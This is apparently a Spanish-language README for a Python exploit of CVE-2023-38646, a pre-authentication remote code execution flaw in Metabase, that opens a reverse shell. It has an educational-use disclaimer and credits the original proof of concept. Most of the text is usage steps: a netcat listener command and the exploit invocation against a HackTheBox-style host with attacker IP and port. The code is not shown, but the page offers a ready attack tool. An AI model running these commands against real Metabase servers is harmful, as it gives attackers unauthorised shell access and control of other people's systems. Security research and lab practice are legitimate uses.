
Exploit en Python para RCE pre-autenticación de Metabase (CVE-2023-38646) que establece una reverse shell para pruebas de seguridad autorizadas.
⚠️ Solo con fines educativos y de investigación de seguridad autorizada
Muy agradecido al autor original del PoC securezeron
Configura el Listener en tu máquina atacante:
nc -nlvp 4444
Luego, ejecuta este comando:
python3 CVE-2023-38646-Reverse-Shell.py -h
python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
